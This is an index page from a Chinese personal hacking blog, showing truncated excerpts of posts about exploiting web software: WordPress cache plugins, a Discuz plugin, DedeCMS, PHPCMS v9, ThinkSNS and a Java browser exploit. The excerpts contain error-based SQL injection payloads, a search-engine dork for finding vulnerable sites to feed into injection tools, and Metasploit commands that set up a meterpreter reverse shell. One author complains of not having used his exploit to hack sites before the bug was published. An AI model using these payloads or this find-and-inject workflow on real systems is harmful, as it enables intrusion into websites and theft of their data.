小马博客

一个无聊的人,一个无聊的博客

存在漏洞的插件名称及版本: 1.wp-super-cache 1.3以下版本 2.w3-total-cache 0.9.2.9以下版本 这两个插件的漏洞官方已经修复..... 漏洞原理是缓存插件在生成一个页面的新缓存时,解析了PHP代码片段。我们将PHP代码写入到目标的文章评...

发布 0 条评论

DZ交友插件漏洞jiaoyou.php?pid=1 有的注入需要登录,注入代码如下: ' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit ...

发布 2 条评论

# Team:c0deplay gbk utf8 最新版本 的存储xss 分析 问题出在 plus/comment/index.php 页面 留言添加功能 function add() // 这里其实可以用到宽字符的 sql注入的 没跟进 $c_content= iconv( ’UTF-8′, ’gb2312//IGNORE’ , $c_content)...

发布 0 条评论

晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯) 出现漏洞的两个文件为: Include/payment/al...

发布 0 条评论

作者:qingran 作者网站:www.qingran.me 首先百度搜索关键字:inurl: (mmdatabase.asp) 我随便列举一个:   www.xxxx.com 修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1 扔入NBSI 或者啊D等各种...

发布 1 条评论

http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html htt...

发布 0 条评论

PHPCMS_V9注入0DAY___EXP 漏洞来源:土司:https://www.t00ls.net/thread-21894-1-1.html EXP构造:haxsscker 土司只给了张烂图- -没给语句……那我就自己构造吧…… 本人构造结果如下: [php] %60userid%60%3D%28select+1+from%28select+...

发布 1 条评论

一. Thinksns简介 ThinkSNS(简称TS),是智士软件开源的开源微博、社交网络平台。采用PHP+MySQL技术平台,微博+应用的产品模式,通过应用、插件、风格包等丰富的机制来扩展功能,同时支持多种常见浏览器和移动客户端。拥有iphone、andr...

发布 1 条评论

哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。 既然已经发出来了,我就把我自己搞的exp发下吧。。唉。 我一般是这样...

发布 0 条评论

[php] use exploit/multi/browser/java_jre17_jmxbean set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit sysinfo getuid [/php] 详细链接及视频: http://ero...

发布 0 条评论